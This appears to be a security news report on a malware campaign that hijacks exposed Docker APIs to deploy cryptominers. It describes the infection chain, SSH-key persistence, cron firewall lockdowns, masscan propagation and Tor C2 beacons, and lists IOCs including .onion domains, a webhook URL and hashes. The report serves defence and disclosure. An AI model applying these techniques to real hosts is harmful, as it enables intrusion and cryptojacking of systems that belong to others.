A newly discovered malware campaign is targeting misconfigured Docker APIs exposed to the internet, deploying cryptominers and establishing resilient persistence mechanisms through the Tor network.
Initially reported in June 2025 by Trend Micro’s Threat Intelligence Team as a Tor-enabled cryptominer dropper, this variant, observed in Akamai Hunt honeypots in August 2025, expands infection capabilities by leveraging host filesystem mounts, automated firewall lockdowns, and a sophisticated Go-based dropper that orchestrates further propagation.
Evolution of Docker-targeting Malware
The initial June 2025 strain exploited open Docker ports (2375) to launch an Alpine: latest container, mount the host root filesystem, and execute a Base64-encoded shell script fetched from a Tor. onion server.
That downloader installed curl and tor, routed purchases through socks5h://localhost:9050, and ultimately deployed an XMRig cryptominer packed in a Zstandard-compressed binary via a second Tor endpoint.
Persistence was achieved by modifying SSH configurations for root login and establishing a cron job for stealthy beaconing.
The Akamai Hunt Team has now identified a variant that diverges significantly. Instead of dropping only a cryptominer, this iteration delivers a multi-tool payload including masscan, libpcap, torsocks, and custom infection capabilities while aggressively denying access by blocking port 2375 at the host level.
Automated firewall rules are inserted via cron to reject incoming TCP traffic on the Docker API port using whichever utility (firewall-cmd, ufw, pfctl, iptables, or nft) is available.
This “superiority” tactic prevents other attackers from leveraging the same host, effectively reserving the compromised instance for the threat actor’s exclusive use.
Technical Breakdown and IOCs
Upon container creation, the Base64 payload installs prerequisites and fetches docker-init.sh from a Tor address. The script:
- Appends an attacker’s ECDSA public key to /root/.ssh/authorized_keys.
- Updates /etc/crontab to execute firewall lockdown commands every minute.
- Posts a JSON beacon with compromised host IP and architecture to a Tor-hosted C2 endpoint.
- Downloads, decompresses, and executes a Go-based “dropper” binary named system-linux-<arch>, which embeds additional tools and orchestrates masscan-driven propagation.
The Go dropper parses the utmp file to identify active sessions, executes masscan scans for port 2375, and, upon discovery, initiates the same container-creation exploit on new targets.
While the binary includes unused logic for Telnet (port 23) and Chromium remote debugging (port 9222) infection techniques, these branches remain dormant pending future enhancements.
Indicators of compromise include unusual container deployments with host bind mounts, Base64-encoded commands invoking tor and curl, cron entries for firewall utilities blocking port 2375, and outbound Tor connections to known .onion domains.
Defenders should closely monitor Docker API access on ports 2375, 23, and 9222; flag newly created containers that immediately install curl, tor, or masscan; inspect crontab for repetitive firewall rule deployments; and block unauthorized Tor traffic.
Restricting Docker API exposure, enforcing network segmentation, rotating default credentials, and locking down remote debugging ports are critical to mitigate this advanced infection vector.
Continuous threat hunting platforms like Akamai Hunt can detect these subtle anomalies and thwart lateral propagation before a complex botnet emerges.
IOCs
| IOC | Type |
|---|---|
| wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion | Domain |
| 2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion | Domain |
| webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 | URL |
| C38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c – docker-init.sh | Hash |
| 649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 – system | Hash |
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
